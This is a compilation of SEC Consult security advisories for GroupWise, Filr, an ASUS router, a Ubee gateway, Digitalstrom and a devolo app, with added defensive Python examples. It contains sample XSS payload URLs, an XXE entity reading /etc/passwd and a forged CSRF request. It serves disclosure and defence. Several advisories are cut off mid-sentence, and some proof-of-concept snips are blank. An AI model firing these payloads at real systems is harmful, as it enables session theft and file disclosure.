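The root cause described above is a parser that honours a DOCTYPE supplied inside an imported file. The following importer is an added example and not code from the advisory or from RSA ECAT: it uses Python's expat bindings directly and fails the import the moment a DOCTYPE, an entity declaration or an external entity reference is seen, before the parser can act on it, so neither local file contents nor outbound connections can be triggered by the document. The `<whitelist><entry .../></whitelist>` document shape and both sample files are constructed for this example; ECAT's real whitelist format is not known from the advisory.

```python
# Added example, not part of the SEC Consult advisory: an XML import routine
# that refuses DTD constructs instead of resolving them.
from xml.parsers import expat


class XmlImportError(ValueError):
    pass


def parse_whitelist(xml_bytes):
    """Parse an (assumed) <whitelist><entry .../></whitelist> document.

    Returns the list of entry attribute dicts. Any DOCTYPE, entity declaration
    or external entity reference aborts parsing with XmlImportError.
    """
    entries = []
    parser = expat.ParserCreate()
    # Never read or expand parameter entities, even if a DOCTYPE were allowed.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise XmlImportError("DOCTYPE not allowed (name=%r, system id=%r)" % (doctype_name, system_id))

    def reject_entity_decl(*decl):
        raise XmlImportError("entity declaration not allowed: %r" % (decl[0],))

    def reject_external_ref(context, base, system_id, public_id):
        raise XmlImportError("external entity reference not allowed: %r" % (system_id,))

    def start_element(name, attrs):
        if name == "entry":
            entries.append(dict(attrs))

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = reject_external_ref
    parser.StartElementHandler = start_element
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        # Undefined entities, bad nesting, etc. are also import failures.
        raise XmlImportError("malformed XML: %s" % exc) from exc
    return entries


def import_is_rejected(xml_bytes):
    """True when parse_whitelist() refuses the document."""
    try:
        parse_whitelist(xml_bytes)
        return False
    except XmlImportError:
        return True


# Constructed sample files. The hash value is a placeholder, not a real digest.
GOOD_WHITELIST = (
    b'<?xml version="1.0"?>'
    b'<whitelist><entry sha256="0000placeholder0000" path="C:/tools/ok.exe"/></whitelist>'
)
# Declares an external entity of the kind the advisory describes; with the
# handlers above it is rejected at the DOCTYPE, before the entity is declared.
MALICIOUS_WHITELIST = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE whitelist [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
    b'<whitelist><entry path="&ext;"/></whitelist>'
)
UNDEFINED_ENTITY = b'<whitelist><entry path="&nope;"/></whitelist>'

if __name__ == "__main__":
    print(parse_whitelist(GOOD_WHITELIST))
    print(import_is_rejected(MALICIOUS_WHITELIST))
```

Rejecting at the DOCTYPE rather than filtering entity bodies is deliberate: the papers linked above show that parameter entities and out-of-band channels give many ways to phrase the same attack, and a document that needs no DTD loses nothing by the refusal.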
SEC Consult SA-20160825-0 :: Multiple vulnerabilities in Micro Focus (Novell) GroupWise
SEC Consult Vulnerability Lab Security Advisory < 20160825-0 >
===
title: Multiple vulnerabilities
product: Micro Focus GroupWise
vulnerable version: GroupWise 2014 R2 (<=SP1)
                    GroupWise 2014 (unsupported versions may be affected)
fixed version: GroupWise 2014 R2 Service Pack 1 Hot Patch 1
CVE number: CVE-2016-5760, CVE-2016-5761, CVE-2016-5762
impact: critical
homepage: https://www.novell.com/products/groupwise/
found: 2016-07
by: W. Ettlinger (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Montreal - Moscow
    Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"Micro Focus GroupWise is a complete collaboration software solution that provides email, calendaring, instant messaging, task management, contact and document management functions. GroupWise has long been praised by customers and industry watchers for its security and reliability."

URL: https://www.novell.com/products/groupwise/

Business recommendation:
During a quick security check SEC Consult found three vulnerabilities in the Micro Focus GroupWise server applications. As these partly critical vulnerabilities were identified during a short time frame SEC Consult recommends to conduct a thorough technical security audit.

Vulnerability overview/description:
---
1) Reflected cross site scripting in the administrator console (CVE-2016-5760)
Two reflected cross site scripting vulnerabilities have been identified in the gwadmin-console application. An attacker could potentially take over an administrator's session.

2) Persistent cross site scripting via emails (CVE-2016-5761)
By sending a single email to a victim an attacker could take over the victim's email account. For a successful exploitation the victim has to click on a link in an email opened in GroupWise WebAccess.
3) Heap-based Buffer Overflow / Integer Overflow (CVE-2016-5762)
By sending a crafted value for the username or the password to GroupWise WebAccess or the GroupWise Post Office Agent during login an attacker can overwrite heap memory. In order to exploit this vulnerability no user authentication is required.

PLEASE NOTE: A successful exploitation of this vulnerability may allow an attacker to execute code remotely. As SEC Consult only conducted a very quick security check this has not been verified.

Proof of concept:
-
1) Reflected cross site scripting in the administrator console
The following links demonstrate reflected cross site scripting vulnerabilities:

https://testhost:9710/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22
https://testhost:9710/gwadmin-console/index.jsp#poa:%3Cimg%20src=x%20onerror=alert%28%27xss%27%29%3E

2) Persistent cross site scripting via emails
The following Python fragment demonstrates the generation of a hyperlink that, when embedded into an HTML email, would, upon clicking it, open a new mail dialog.

snip
msg = """ click me """.replace('$charcode', ','.join(str(ord(x)) for x in list('idNewPopupMenu')))
snip

3) Heap-based Buffer Overflow / Integer Overflow
When a username or password longer than 65332 (2^16 - 3) is specified, an overflow causes the Post Office Agent to allocate too little memory. The following pseudocode shows how the memory to be allocated is calculated based on the input length.

((uint16_t) (() + 3) & 0xFFFC) + 1)

Therefore, a value of 65533 would cause the application to allocate 1 byte. By modifying this value accordingly, an attacker can cause the application to allocate an arbitrary amount of memory. The user-specified value is then copied into this buffer until a NUL-byte is reached. This allows an attacker to write non-NUL bytes after the allocated heap chunk.

Vulnerable / tested versions:
-
The version 2014 R2 SP1 of Micro Focus GroupWise was found to be vulnerable.
This version was the latest version at the time of the discovery.

Vendor contact timeline:
2016-07-05: Contacting vendor through secur...@novell.com
2016-07-06: Micro Focus was able to reproduce the vulnerabilities
2016-07-25: Micro Focus: The issues have been resolved in development
2016-08-12: Micro Focus: Hotpatch is currently undergoing QA
2016-08-25: Coordinated release of security advisory

Solution:
-
The "GroupWise 2014 R2 Service Pack 1 Hot Patch 1" should be applied immediately. This upda
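The size calculation in finding 3 is worth working through, because the cast to uint16_t sits inside the expression and silently wraps the rounded-up length. The following model is an added example, not code from the advisory or from GroupWise: it reproduces the pseudocode with the 16-bit truncation made explicit (the term the advisory's pseudocode leaves blank is taken to be the input length, as the surrounding text says), computes how many input bytes would land past the allocation, and sets a safe variant beside it that rejects lengths the 16-bit arithmetic cannot represent. The 65532 cap in the safe variant is this example's assumption.

```python
# Added example, not part of the SEC Consult advisory: model of the
# allocation-size arithmetic behind CVE-2016-5762 and a checked variant.

def vulnerable_alloc_size(length):
    """((uint16_t)(length + 3) & 0xFFFC) + 1, with the C cast spelled out.

    'length' stands in for the blank term in the advisory's pseudocode
    (assumed to be the username/password length). (x + 3) & ~3 rounds up to
    a multiple of four, but the cast throws away everything above 16 bits first.
    """
    rounded = (length + 3) & 0xFFFF   # uint16_t truncation
    return (rounded & 0xFFFC) + 1


def overflow_margin(length):
    """Bytes of non-NUL input copied past the chunk vulnerable_alloc_size() returns."""
    return max(0, length - vulnerable_alloc_size(length))


MAX_CREDENTIAL_LEN = 65532  # largest length the 16-bit rounding can hold (assumption)


def safe_alloc_size(length):
    """Same rounding, computed in full width, with the input range checked first."""
    if length < 0 or length > MAX_CREDENTIAL_LEN:
        raise ValueError("credential length %d out of range" % length)
    return ((length + 3) & 0xFFFC) + 1


def input_is_accepted(length):
    try:
        safe_alloc_size(length)
        return True
    except ValueError:
        return False


def safe_variant_never_overflows():
    """Exhaustively confirm safe_alloc_size() always leaves room for length + 1 bytes."""
    return all(safe_alloc_size(n) >= n + 1 for n in range(MAX_CREDENTIAL_LEN + 1))


if __name__ == "__main__":
    for n in (10, 65532, 65533, 65534, 70000):
        print(n, vulnerable_alloc_size(n), overflow_margin(n), input_is_accepted(n))
```

The exhaustive check is cheap (65 533 iterations) and is the kind of property a unit test for length-to-size arithmetic should state outright: the allocation must cover the copy plus its terminator for every accepted length.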
SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
===
title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846
fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609, CVE-2016-1610, CVE-2016-1611
impact: critical
homepage: https://www.novell.com/products/filr/
found: 2016-05-23
by: W. Ettlinger (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Montreal - Moscow
    Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"Unlike other mobile file access and collaborative file sharing solutions, Micro Focus Filr has been designed with the enterprise in mind, resulting in less administration, better security and more productive users."

URL: https://www.novell.com/products/filr/

Business recommendation:
During a very quick security check several vulnerabilities with high impact have been discovered. SEC Consult recommends to immediately apply the patches provided by Micro Focus to address these issues.

Please note that since SEC Consult did not conduct a thorough technical security check SEC Consult cannot make a statement regarding the overall security of the Micro Focus Filr appliance.

Vulnerability overview/description:
---
During a quick security check several vulnerabilities have been identified that ultimately allow an attacker to completely compromise the appliance:

1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administrative interface lack protection against CSRF attacks. This allows an attacker who targets an authenticated administrator to reconfigure the appliance.

2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to execute arbitrary operating system commands.
Please note that an attacker can combine this vulnerability with vulnerability #1. In this scenario, an attacker does not need to be authenticated.

3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance administration interface. This application server is started as the superuser "root".

Please note that combined with vulnerability #1 and #2 an attacker can run commands as the superuser "root" without the need for any authentication.

For vendor remark on #3 see solution section.

4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript code from user input. However, this filter can be bypassed to persistently inject JavaScript code into the Filr web interface.

5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the administrative appliance web interface and the Filr web interface.

Please note that combined with vulnerability #4 an attacker can steal session cookies of both the appliance administration interface and the Filr web interface (since cookies are shared across ports).

For vendor remark on #5 see solution section.

6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.

7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails to restrict the directory the templates are uploaded to.

Please note that combined with vulnerability #6 an attacker is able to upload arbitrary files with the permissions of the system user "wwwrun".

8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a local attacker with restricted privileges to inject commands that are being executed as privileged users as soon as they log into the system.
Please note that combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject commands that are executed as privileged system users (e.g. root) using the Filr web interface.

Proof of concept:
-
1, 2, 3) The following HTML fragment demonstrates that using a CSRF attack (#1) system commands can be injected (#2) that are executed as the user root (#3):

- snip -
- snip -

4) The following string demonstrates how the XSS filter can be circumvented:

This string can e.g. be used by a restricted user in the "phone" field of the user prof
SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information disclosure
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
===
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
    Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"ASUS has long been at the forefront of this growth and while the company started life as a humble motherboard manufacturer with just a handful of employees, it is now the leading technology company in Taiwan with over 12,500 employees worldwide. ASUS makes products in almost every area of Information Technology too, including PC components, peripherals, notebooks, tablets, servers and smartphones."

Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS

Business recommendation:
SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware. If the web path is longer than 50 characters, it will redirect a user to the cloud_sync.asp page with the web path as a value of a GET parameter. Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. No authentication is required.

2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including the hostname and private IP addresses of the local machines connected to the router from the WAN IP address.

Proof of concept:
-
1.
Reflected Cross-Site Scripting HTTP Request: GET /111'+alert('XSS')+' HTTP/1.1 Host: HTTP Response: HTTP/1.0 200 OK Server: httpd Date: Tue, 12 Apr 2016 09:04:48 GMT Content-Type: text/html Connection: close location.href='/cloud_sync.asp?flag=111'+alert('XSS')+''; 2. Remote DHCP Information Disclosure HTTP Request: GET /Nologin.asp HTTP/1.1 Host: HTTP Response: HTTP/1.0 200 Ok Server: httpd [...] var dhcpLeaseInfo = [['', ''],['', ''],['', '']];; function initial(){ [...] Vulnerable / tested versions: - The following firmware has been tested which was the most recent version at the time of discovery: - 3.0.0.4.376_2736 (2015/01/19 update) URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/ Vendor contact timeline: 2016-06-02: Contacting vendor through priv...@asus.com and netad...@asus.com.tw. 2016-06-03: ASUS responds and establishes encrypted communication channel. 2016-06-06: Sending PGP encrypted security advisory to ASUS. 2016-06-20: Vulnerability is fixed in beta firmware. 2016-06-24: Public release of the advisory. Solution: - Upgrade to firmware version 3.0.0.4_380_3679 or later. Workaround: --- No workaround available. Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. 
~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: r
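The following is an added example and not code from the advisory or from the ASUS firmware. It models the redirect the ASUS proof of concept shows (the requested path pasted into a single-quoted JavaScript string) beside two hardened variants, and a small scanner that tells the two apart: a redirect statement must contain exactly one JavaScript string literal, and the advisory's payload `/111'+alert('XSS')+'` turns the vulnerable statement into three. The function names and the second test path are assumptions; only the payload path is taken from the advisory.

```python
import json
from urllib.parse import quote

# Constructed example; this is not the ASUS httpd code. It models the
# redirect shown in the advisory: the requested path ends up inside a
# single-quoted JavaScript string in an inline script.
PAYLOAD_PATH = "/111'+alert('XSS')+'"          # payload from the advisory


def vulnerable_redirect(path: str) -> str:
    """Mirror the vulnerable response body: the raw path is pasted into a JS
    string literal with no encoding at all."""
    return "location.href='/cloud_sync.asp?flag=%s';" % path.lstrip("/")


def hardened_redirect_urlencoded(path: str) -> str:
    """Fix 1: percent-encode the value before it enters the query string.
    quote(..., safe="") leaves only [A-Za-z0-9_.~-] untouched, so quotes,
    '+', '(' and ')' never reach the JavaScript parser."""
    return "location.href='/cloud_sync.asp?flag=%s';" % quote(path.lstrip("/"), safe="")


def hardened_redirect_jsliteral(path: str) -> str:
    """Fix 2: emit the whole URL as a JSON string literal (valid JS) and
    additionally escape '<', '>' and '/' so the literal can never contain a
    '</script>' sequence that would terminate the inline script early."""
    literal = json.dumps("/cloud_sync.asp?flag=" + path.lstrip("/"))
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("/", "\\/")
    return "location.href=%s;" % literal


def count_js_string_literals(src: str) -> int:
    """Tiny scanner for JS string literals that honours backslash escapes.
    A redirect statement should contain exactly one literal; more than one
    means an attacker-controlled value broke out of the string."""
    count, quote_char, i = 0, None, 0
    while i < len(src):
        c = src[i]
        if quote_char is None:
            if c in "'\"":
                quote_char, count = c, count + 1
        elif c == "\\":
            i += 1  # skip the escaped character
        elif c == quote_char:
            quote_char = None
        i += 1
    return count


def is_safe_redirect(statement: str) -> bool:
    """One literal and no premature </script>: the value stayed data."""
    return count_js_string_literals(statement) == 1 and "</script" not in statement.lower()
```

Percent-encoding is the natural fix for a value that is a query-string parameter; the JSON-literal variant is the general answer whenever untrusted data must land in a JavaScript string, because it also handles values that are not URLs.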
SEC Consult SA-20160602-0 :: Multiple critical vulnerabilities in Ubee EVW3226 Advanced wireless voice gateway
SEC Consult Vulnerability Lab Security Advisory < 20160602-0 >
=======================================================================
              title: Multiple critical vulnerabilities
            product: Ubee EVW3226 Advanced wireless voice gateway
 vulnerable version: Firmware EVW3226_1.0.20
      fixed version: -
         CVE number: -
             impact: critical
           homepage: http://www.ubeeinteractive.com
              found: 2016-01-09
                 by: Manuel Hofer (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ubee Interactive is on a mission. A mission that began with the development
of our industry-defining line of DOCSIS cable modems. And one that continues
with a drive toward becoming the leading business-to-business provider of
broadband connectivity products and solutions worldwide. Our current product
portfolio includes data, voice, video, mobility and portable devices."

Source: http://www.ubeeinteractive.com/products/cable/evw3226

Business recommendation:
------------------------
Network security should not depend on the security of independent devices
such as cable modems. An attacker with root access to such a device can mount
attacks on connected networks, such as administrative networks managed by the
ISP, or on other cable modem users. The vulnerabilities described in this
advisory might be exploited in combination with other vulnerabilities not
associated with this product (XSS in web forums accessed from behind the
modem, malvertising, etc.).

SEC Consult highly recommends not to use this device until a thorough
security review has been performed by security professionals and all
identified issues have been resolved. It is assumed that further critical
vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
-----------------------------------
1) Missing authentication for configuration download
The admin interface does not require any authentication before a previously
requested configuration backup file can be downloaded.

2) Plaintext storage of administrative password
The password of the user "admin" is stored in cleartext. An attacker with
access to the configuration file or to the device itself can easily obtain
this password. By exploiting issue 1) the cleartext admin password can be
retrieved without authentication.

3) "Encrypted" configuration backup not actually encrypted
A certain built-in CGI action [removed] asks the user to provide a password
in order to "encrypt your configuration's backup". A quick analysis of this
function has shown that the configuration backup is not encrypted at all:
the only effect of the password is that a file "pass.txt", containing the
user-supplied password in cleartext, is appended to the archive. Besides
promoting a false sense of security, this means an attacker with access to
the configuration file also obtains the cleartext password for the admin
interface.

4) Authenticated arbitrary file upload leading to arbitrary command execution
By analysing the configuration file format and exploiting a known
vulnerability in the BusyBox tar implementation, it is possible to upload
arbitrary files to the device. This enables an attacker to execute arbitrary
system commands and gain full root access on the device.

5) Heap-based buffer overflow in URL decoding
The function responsible for URL decoding sizes the buffer for the decoded
string based on the number of '%' characters in the request string. Since
that count does not bound the length of the decoded output, the decoder can
write beyond the allocated buffer, resulting in a heap-based buffer overflow.

Proof of concept:
-----------------
Since no public fix is available for any of the described vulnerabilities
yet, the proof of concept will not be published.

Vulnerable / tested versions:
-----------------------------
The following firmware has been tested, which was the most recent version at
the time of discovery:
EVW3226_1.0.20

Vendor contact timeline:
------------------------
2016-01-13: Contacting CERT.at for security contact of UPC Austria (Liberty Global).
2016-01-17: Contacting vendor Ubee Interactive through
            'eusupp...@ubeeinteractive.com' and 'eusa...@ubeeinteractive.com',
            requesting security contact.
2016-01-17: Disclosure of identified vulnerabilities to UPC Austria in advance.
2016-01-20: No reply from Ubee Interactive. Requesting direct contact through
            UPC Austria.
2016-01-22: Received contact at Ubee Interactive. Establishing contact with
            <michael@ubeeinteractive.com>, again asking for public key to sen
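As an added example, not part of the advisory and not Ubee firmware code, the snippet below models issue 3) the way the advisory describes it (a tar archive with a cleartext "pass.txt" appended) and shows the two checks a reviewer would run on such a backup before trusting it: does it leak a password, and does it contain member names that would escape the extraction directory on the device. The advisory does not name the BusyBox tar bug behind issue 4), so treating "../" and absolute member names as the unsafe class is an assumption, as are the file names, contents and the gzip framing.

```python
import io
import posixpath
import tarfile

# Constructed example, not Ubee firmware code. It models the backup format
# the advisory describes: a tar archive to which the device appends a
# "pass.txt" holding the user-supplied "encryption" password in cleartext.
# Member names, the config file name and all sample contents are assumptions.


def _add_member(tar: tarfile.TarFile, name: str, data: bytes) -> None:
    info = tarfile.TarInfo(name)
    info.size = len(data)
    tar.addfile(info, io.BytesIO(data))


def build_device_backup(config: bytes, password: str, extra=None) -> bytes:
    """Produce a backup the way the advisory says the device does: the
    configuration plus pass.txt. `extra` maps additional member names to
    contents, which lets a test add attacker-chosen entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        _add_member(tar, "config.xml", config)
        _add_member(tar, "pass.txt", password.encode())
        for name, data in (extra or {}).items():
            _add_member(tar, name, data)
    return buf.getvalue()


def audit_backup(blob: bytes) -> dict:
    """Inspect a backup without extracting it. Reports the cleartext
    password if pass.txt is present, and any member whose name would land
    outside the extraction directory (the traversal class that turns a
    file upload into an arbitrary file write). Symlink and hardlink members
    are flagged too, since they redirect later writes."""
    report = {"cleartext_password": None, "unsafe_members": [], "members": []}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tar:
        for member in tar.getmembers():
            report["members"].append(member.name)
            norm = posixpath.normpath(member.name)
            escapes = member.name.startswith("/") or norm == ".." or norm.startswith("../")
            if escapes or member.issym() or member.islnk():
                report["unsafe_members"].append(member.name)
            if member.isfile() and posixpath.basename(member.name) == "pass.txt":
                fh = tar.extractfile(member)
                report["cleartext_password"] = fh.read().decode("utf-8", "replace").strip()
    return report
```

The audit reads member headers only and never extracts, so it is safe to run on an untrusted archive; a real restore path would additionally reject anything `audit_backup` lists under `unsafe_members` before handing the archive to tar.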
SEC Consult SA-20160422-1 :: Multiple vulnerabilities in Digitalstrom Konfigurator
SEC Consult Vulnerability Lab Security Advisory < publishing date 20160422-1 >
=======================================================================
              title: Multiple vulnerabilities in Digitalstrom Konfigurator
            product: Digitalstrom Konfigurator
 vulnerable version: 1.10.0
      fixed version: 1.10.4
         CVE number: -
             impact: High
           homepage: http://www.digitalstrom.com/
              found: 2015-10-01
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Digitalstrom is designed to systematically network all the electrical
devices in your home. The control of light ambiances, security technology
and household devices is just the start. You can simply download these new
functions to your Digitalstrom server; they will install themselves
automatically. And tomorrow has already become today."

Source: http://www.digitalstrom.com/en/idea/Good-morning/

Business recommendation:
------------------------
SEC Consult recommends every user to sign out immediately after configuring
the Digitalstrom installation in the Digitalstrom Konfigurator. This limits
cross-site request forgery attacks, because a forged request is only
accepted while the browser still holds a valid session. Furthermore, every
user should be aware that an attack could occur every time they click on an
unknown link.

However, SEC Consult recommends the vendor to conduct a comprehensive
security analysis, based on security source code reviews, in order to
identify all vulnerabilities in the Digitalstrom Konfigurator and increase
the security of its customers.

Vulnerability overview/description:
-----------------------------------
1) Multiple Persistent Cross-Site Scripting
Digitalstrom Konfigurator suffers from multiple cross-site scripting
vulnerabilities, which allow stealing session tokens and impersonating other
users in order to gain unauthorized access to the web interface. Furthermore,
it is possible to alter the contents of the interface in the context of the
current user.

2) Cross-Site Request Forgery
Digitalstrom Konfigurator does not implement any kind of cross-site request
forgery protection. Attackers are therefore able to execute arbitrary
requests with the privileges of any user; the only requirement is that the
victim visits a malicious web page. For example, an administrator can be
forced to execute unwanted actions, among them:
-) Change network configuration
-) Enable SSH service
-) Turn various devices on and off

Proof of concept:
-----------------
Has been removed at the request of the vendor.

Vulnerable / tested versions:
-----------------------------
Digitalstrom Konfigurator 1.10.0

Vendor contact timeline:
------------------------
2015-11-09: Transmission of advisory via email
2015-12-02: As requested by Digitalstrom: new PoC for XSS
2016-01-31: Vendor released updated version 1.10.4
2016-04-22: Public advisory release

Solution:
---------
Upgrade to version 1.10.4. The effectiveness of the vendor's update was not
verified by the SEC Consult Vulnerability Lab.

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2015
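The following is an added example, not code from the advisory or from the Digitalstrom Konfigurator. It shows the protection the advisory reports as missing, applied to the three actions it lists (network configuration, SSH, switching devices): a per-session synchronizer token that a page on another origin cannot read, an Origin/Referer check, and the rule that a logged-out session rejects state changes, which is what makes the advisory's "sign out" advice effective. The origin, endpoint paths, header and form field names are assumptions.

```python
import hmac
import secrets

# Constructed example, not Digitalstrom Konfigurator code. The origin,
# endpoint paths, header names and form field names are assumptions.
TRUSTED_ORIGIN = "https://dss.local"           # assumed Konfigurator origin
STATE_CHANGING = {                              # assumed endpoint paths for
    "/json/system/setNetworkConfig",            # the actions the advisory lists
    "/json/system/enableSsh",
    "/json/device/turnOn",
    "/json/device/turnOff",
}


def new_session() -> dict:
    """A logged-in browser session. The token is bound to the session and
    only ever embedded in pages served from TRUSTED_ORIGIN, so a page on
    another origin cannot read it to forge a request."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def _from_trusted_origin(headers: dict) -> bool:
    origin = headers.get("Origin")
    if origin is not None:
        return origin == TRUSTED_ORIGIN
    referer = headers.get("Referer", "")
    return referer == TRUSTED_ORIGIN or referer.startswith(TRUSTED_ORIGIN + "/")


def accept_request(session, request: dict) -> bool:
    """request = {'method', 'path', 'headers', 'form'}. Read-only paths pass.
    A state-changing request is accepted only when a session exists, the
    request is a POST carrying the session's token, and it originates from
    the Konfigurator's own origin."""
    if request["path"] not in STATE_CHANGING:
        return True
    if session is None:
        return False                        # signed out: nothing to forge
    if request["method"] != "POST":
        return False                        # never change state on a link click
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return False
    return _from_trusted_origin(request["headers"])


def legit_request(session: dict) -> dict:
    """A request issued by the Konfigurator's own page."""
    return {"method": "POST", "path": "/json/system/enableSsh",
            "headers": {"Origin": TRUSTED_ORIGIN},
            "form": {"csrf_token": session["csrf_token"]}}


def forged_request() -> dict:
    """What an auto-submitting form on an attacker's page produces: the
    browser attaches the victim's session cookie, but the attacker cannot
    know the token and the Origin header names the attacker's site."""
    return {"method": "POST", "path": "/json/system/enableSsh",
            "headers": {"Origin": "https://attacker.example"},
            "form": {"csrf_token": "guess"}}
```

The token check alone defeats the attack; the origin check is defence in depth against a token leaking through the persistent XSS also described in this advisory being reused from another site, and the GET rejection closes the plain link-click vector.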
SEC Consult SA-20160422-0 :: Insecure credential storage in my devolo Android app
SEC Consult Vulnerability Lab Security Advisory < 20160422-0 >
=======================================================================
              title: Insecure data storage
            product: my devolo - android application - air.de.devolo.my.devolo
 vulnerable version: 1.2.8
      fixed version:
         CVE number:
             impact: High
           homepage: http://www.devolo.com/
              found: 2015-10-30
                 by: A. Nochvay (Office Moscow)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"devolo AG has been developing innovative Powerline and data communications
products for private customers and professional users. devolo Home Control
expands on the idea of the easy way to connect and is emerging as a new
product world for the smart home that simply enables greater comfort and
convenience, security and energy savings."

URL: http://www.devolo.com/en/Company/devolo-AG

Business recommendation:
------------------------
Attackers might be able to recover sensitive information from stolen or lost
devices. With this information attackers can control the user's smart
devices, change the temperature and watch the user's remote camera.

SEC Consult recommends not to store sensitive information on mobile devices.

Vulnerability overview/description:
-----------------------------------
The application "my devolo" uses the Android SharedPreferences mechanism to
store information about the user, including the login credentials for the
site mydevolo.com. SharedPreferences are plain XML files in the application's
private data directory; should an adversary physically obtain the mobile
device, they can connect it to a computer with freely available tools that
expose the data directories of third-party applications and read the stored
credentials.

Proof of concept:
-----------------
Has been removed at the request of the vendor.

Vulnerable / tested versions:
-----------------------------
The vulnerability has been discovered in "my devolo" version 1.2.8, which is
the latest version in the Google Play Store at this time.

Vendor contact timeline:
------------------------
2015-11-10: Transmission of advisory via a data-exchange platform provided by
            the vendor
2016-02-23: Confirmation of the described issue via email by vendor
2016-04-22: Public advisory release

Solution:
---------
No solution available.

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

EOF Aleksandr Nochvay / @2015
SEC Consult SA-20160210-0 :: Yeager CMS Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Yeager CMS
